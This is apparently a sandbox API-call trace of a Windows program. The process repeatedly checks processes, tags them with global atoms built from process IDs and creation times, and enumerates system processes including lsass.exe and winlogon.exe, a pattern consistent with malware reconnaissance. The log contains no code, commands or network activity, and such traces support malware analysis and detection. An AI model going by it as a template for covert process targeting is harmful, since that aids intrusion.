	[0125.783] CloseHandle (hObject=0x69c) returned 1
	[0125.783] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.783] CloseHandle (hObject=0x69c) returned 1
	[0125.783] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.783] CloseHandle (hObject=0x69c) returned 1
	[0125.783] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.783] CloseHandle (hObject=0x69c) returned 1
	[0125.784] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.784] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.784] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.784] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0125.785] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.785] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.785] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.786] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.786] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.786] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.786] CloseHandle (hObject=0x69c) returned 1
	[0125.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.786] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.786] CloseHandle (hObject=0x69c) returned 1
	[0125.786] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.786] CloseHandle (hObject=0x69c) returned 1
	[0125.786] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.786] CloseHandle (hObject=0x69c) returned 1
	[0125.787] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.787] CloseHandle (hObject=0x69c) returned 1
	[0125.787] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.787] CloseHandle (hObject=0x69c) returned 1
	[0125.821] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.822] CloseHandle (hObject=0x69c) returned 1
	[0125.822] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.822] CloseHandle (hObject=0x69c) returned 1
	[0125.822] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.822] CloseHandle (hObject=0x69c) returned 1
	[0125.822] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.822] CloseHandle (hObject=0x69c) returned 1
	[0125.823] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.823] CloseHandle (hObject=0x69c) returned 1
	[0125.823] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.823] CloseHandle (hObject=0x69c) returned 1
	[0125.823] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.823] CloseHandle (hObject=0x69c) returned 1
	[0125.823] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.823] CloseHandle (hObject=0x69c) returned 1
	[0125.823] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.823] CloseHandle (hObject=0x69c) returned 1
	[0125.824] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.824] CloseHandle (hObject=0x69c) returned 1
	[0125.824] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.824] CloseHandle (hObject=0x69c) returned 1
	[0125.824] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.824] CloseHandle (hObject=0x69c) returned 1
	[0125.824] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.824] CloseHandle (hObject=0x69c) returned 1
	[0125.824] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.824] CloseHandle (hObject=0x69c) returned 1
	[0125.825] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.825] CloseHandle (hObject=0x69c) returned 1
	[0125.825] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.825] CloseHandle (hObject=0x69c) returned 1
	[0125.825] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.825] CloseHandle (hObject=0x69c) returned 1
	[0125.825] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.825] CloseHandle (hObject=0x69c) returned 1
	[0125.825] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.825] CloseHandle (hObject=0x69c) returned 1
	[0125.826] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.826] CloseHandle (hObject=0x69c) returned 1
	[0125.826] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.826] CloseHandle (hObject=0x69c) returned 1
	[0125.826] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.826] CloseHandle (hObject=0x69c) returned 1
	[0125.826] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.826] CloseHandle (hObject=0x69c) returned 1
	[0125.826] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.827] CloseHandle (hObject=0x69c) returned 1
	[0125.827] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.827] CloseHandle (hObject=0x69c) returned 1
	[0125.827] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.827] CloseHandle (hObject=0x69c) returned 1
	[0125.827] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.827] CloseHandle (hObject=0x69c) returned 1
	[0125.827] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.827] CloseHandle (hObject=0x69c) returned 1
	[0125.828] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.828] CloseHandle (hObject=0x69c) returned 1
	[0125.828] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.828] CloseHandle (hObject=0x69c) returned 1
	[0125.828] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.828] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.828] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.829] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0125.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.829] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.830] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.830] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.830] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.830] CloseHandle (hObject=0x69c) returned 1
	[0125.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.830] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.830] CloseHandle (hObject=0x69c) returned 1
	[0125.830] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.830] CloseHandle (hObject=0x69c) returned 1
	[0125.830] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.831] CloseHandle (hObject=0x69c) returned 1
	[0125.831] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.831] CloseHandle (hObject=0x69c) returned 1
	[0125.831] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.831] CloseHandle (hObject=0x69c) returned 1
	[0125.864] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.864] CloseHandle (hObject=0x69c) returned 1
	[0125.864] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.864] CloseHandle (hObject=0x69c) returned 1
	[0125.864] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.865] CloseHandle (hObject=0x69c) returned 1
	[0125.865] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.865] CloseHandle (hObject=0x69c) returned 1
	[0125.865] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.865] CloseHandle (hObject=0x69c) returned 1
	[0125.865] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.865] CloseHandle (hObject=0x69c) returned 1
	[0125.865] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.865] CloseHandle (hObject=0x69c) returned 1
	[0125.866] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.866] CloseHandle (hObject=0x69c) returned 1
	[0125.866] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.866] CloseHandle (hObject=0x69c) returned 1
	[0125.866] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.866] CloseHandle (hObject=0x69c) returned 1
	[0125.866] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.866] CloseHandle (hObject=0x69c) returned 1
	[0125.866] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.866] CloseHandle (hObject=0x69c) returned 1
	[0125.867] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.867] CloseHandle (hObject=0x69c) returned 1
	[0125.867] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.867] CloseHandle (hObject=0x69c) returned 1
	[0125.867] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.867] CloseHandle (hObject=0x69c) returned 1
	[0125.867] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.867] CloseHandle (hObject=0x69c) returned 1
	[0125.867] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.867] CloseHandle (hObject=0x69c) returned 1
	[0125.868] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.868] CloseHandle (hObject=0x69c) returned 1
	[0125.868] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.868] CloseHandle (hObject=0x69c) returned 1
	[0125.868] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.868] CloseHandle (hObject=0x69c) returned 1
	[0125.868] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.868] CloseHandle (hObject=0x69c) returned 1
	[0125.868] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.868] CloseHandle (hObject=0x69c) returned 1
	[0125.869] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.869] CloseHandle (hObject=0x69c) returned 1
	[0125.869] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.869] CloseHandle (hObject=0x69c) returned 1
	[0125.869] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.869] CloseHandle (hObject=0x69c) returned 1
	[0125.869] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.870] CloseHandle (hObject=0x69c) returned 1
	[0125.870] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.870] CloseHandle (hObject=0x69c) returned 1
	[0125.870] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.870] CloseHandle (hObject=0x69c) returned 1
	[0125.870] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.870] CloseHandle (hObject=0x69c) returned 1
	[0125.871] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.871] CloseHandle (hObject=0x69c) returned 1
	[0125.871] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.871] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.871] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.871] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0125.872] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.872] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.872] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.872] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.872] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.872] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.872] CloseHandle (hObject=0x69c) returned 1
	[0125.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.873] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.913] CloseHandle (hObject=0x69c) returned 1
	[0125.913] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.913] CloseHandle (hObject=0x69c) returned 1
	[0125.913] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.913] CloseHandle (hObject=0x69c) returned 1
	[0125.914] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.914] CloseHandle (hObject=0x69c) returned 1
	[0125.914] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.914] CloseHandle (hObject=0x69c) returned 1
	[0125.952] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.952] CloseHandle (hObject=0x69c) returned 1
	[0125.952] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.952] CloseHandle (hObject=0x69c) returned 1
	[0125.952] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.952] CloseHandle (hObject=0x69c) returned 1
	[0125.952] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.953] CloseHandle (hObject=0x69c) returned 1
	[0125.953] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.953] CloseHandle (hObject=0x69c) returned 1
	[0125.953] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.953] CloseHandle (hObject=0x69c) returned 1
	[0125.953] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.953] CloseHandle (hObject=0x69c) returned 1
	[0125.953] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.953] CloseHandle (hObject=0x69c) returned 1
	[0125.954] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.954] CloseHandle (hObject=0x69c) returned 1
	[0125.954] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.954] CloseHandle (hObject=0x69c) returned 1
	[0125.954] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.954] CloseHandle (hObject=0x69c) returned 1
	[0125.954] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.954] CloseHandle (hObject=0x69c) returned 1
	[0125.954] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.954] CloseHandle (hObject=0x69c) returned 1
	[0125.955] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.955] CloseHandle (hObject=0x69c) returned 1
	[0125.955] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.955] CloseHandle (hObject=0x69c) returned 1
	[0125.955] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.955] CloseHandle (hObject=0x69c) returned 1
	[0125.955] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.955] CloseHandle (hObject=0x69c) returned 1
	[0125.955] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.955] CloseHandle (hObject=0x69c) returned 1
	[0125.956] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.956] CloseHandle (hObject=0x69c) returned 1
	[0125.956] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.956] CloseHandle (hObject=0x69c) returned 1
	[0125.956] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.956] CloseHandle (hObject=0x69c) returned 1
	[0125.956] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.956] CloseHandle (hObject=0x69c) returned 1
	[0125.956] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.956] CloseHandle (hObject=0x69c) returned 1
	[0125.957] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.957] CloseHandle (hObject=0x69c) returned 1
	[0125.957] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.957] CloseHandle (hObject=0x69c) returned 1
	[0125.957] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.957] CloseHandle (hObject=0x69c) returned 1
	[0125.957] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.957] CloseHandle (hObject=0x69c) returned 1
	[0125.957] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.957] CloseHandle (hObject=0x69c) returned 1
	[0125.958] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.958] CloseHandle (hObject=0x69c) returned 1
	[0125.958] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.958] CloseHandle (hObject=0x69c) returned 1
	[0125.958] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.959] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.959] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.959] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0125.959] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.959] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.959] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.960] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.960] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.960] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.960] CloseHandle (hObject=0x69c) returned 1
	[0125.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.960] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.961] CloseHandle (hObject=0x69c) returned 1
	[0125.961] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.961] CloseHandle (hObject=0x69c) returned 1
	[0125.961] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.961] CloseHandle (hObject=0x69c) returned 1
	[0125.961] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.968] CloseHandle (hObject=0x69c) returned 1
	[0125.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5970, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0125.968] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.968] CloseHandle (hObject=0x69c) returned 1
	[0125.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d368, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0125.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16e18) returned 0xc0000004
	[0126.001] VirtualAlloc (lpAddress=0x0, dwSize=0x16f18, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0126.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16f18, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0126.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0126.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
